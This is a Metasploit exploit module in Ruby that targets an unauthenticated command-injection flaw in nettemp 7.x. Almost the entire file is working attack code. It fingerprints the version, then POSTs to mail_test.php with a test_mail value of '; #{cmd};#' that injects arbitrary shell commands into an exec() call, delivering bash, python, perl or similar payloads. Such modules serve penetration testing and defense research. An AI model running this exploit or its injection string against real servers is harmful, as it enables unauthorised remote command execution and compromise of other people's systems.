This module exploits a command execution vulnerability in nettemp version 7.x which could be abused to allow unauthenticated users to execute arbitrary commands under the context of the web server user. The 'mail_test.php' file calls 'exec()' with user controlled data from the 'test_mail' parameter.

nettemp_cmd_exec.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'            => "Nettemp Command Execution",
      'Description'     => %q{
          This module exploits a command execution vulnerability in nettemp
        version 7.x which could be abused to allow unauthenticated users to
        execute arbitrary commands under the context of the web server user.
        The 'mail_test.php' file calls 'exec()' with user controlled data
        from the 'test_mail' parameter.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
        ],
      'References'      =>
        [
          ['URL', 'https://github.com/sosprz/nettemp/pull/6'],
          ['URL', 'https://github.com/sosprz/nettemp/pull/7'],
          ['URL', 'https://github.com/sosprz/nettemp/pull/8']
        ],
      'Payload'         =>
        {
          'BadChars'    => "\x00\x0a\x0d"
        },
      'Platform'        => %w{ win linux unix },
      'Compat'          =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic python perl ruby telnet bash',
        },
      'Targets'         =>
        [['Automatic Targeting', { 'auto' => true }]],
      'Privileged'      => false,
      'Arch'            => ARCH_CMD,
      'DisclosureDate'  => 'Oct 14 2013',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to nettemp', '/nettemp/'])
      ], self.class)
  end

  #
  # Execute a command
  #
  def http_send_command(cmd, opts={})
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'modules/mail/html/mail_test.php'),
      'method'    => 'POST',
      'vars_post' => {
        'mail_test1' => 'mail_test2',
        'test_mail'  => "; #{cmd};#"
      }
    })
    return res
  end

  #
  # Wrap command execution
  #
  def execute_command(cmd, opts = {})
    vprint_status("#{peer} - Attempting to execute: '#{cmd}'")
    http_send_command(cmd)
  end

  #
  # Check for nettemp version 7.x
  #
  def check
    print_status("#{peer} - Checking vulnerability")
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    elsif res.body =~ /www\.nettemp\.pl v([\d\.]+)/
      version = $1
      print_good("#{peer} - Found version: #{version}")
      if version =~ /^7/
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error("#{peer} - Could not detect nettemp")
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Unknown
  end

  #
  # Exploit
  #
  def exploit
    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
    res = execute_command("#{payload.encoded}")
    if res
      print_good("#{peer} - Payload sent successfully")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - Sending payload failed")
    end
  end

end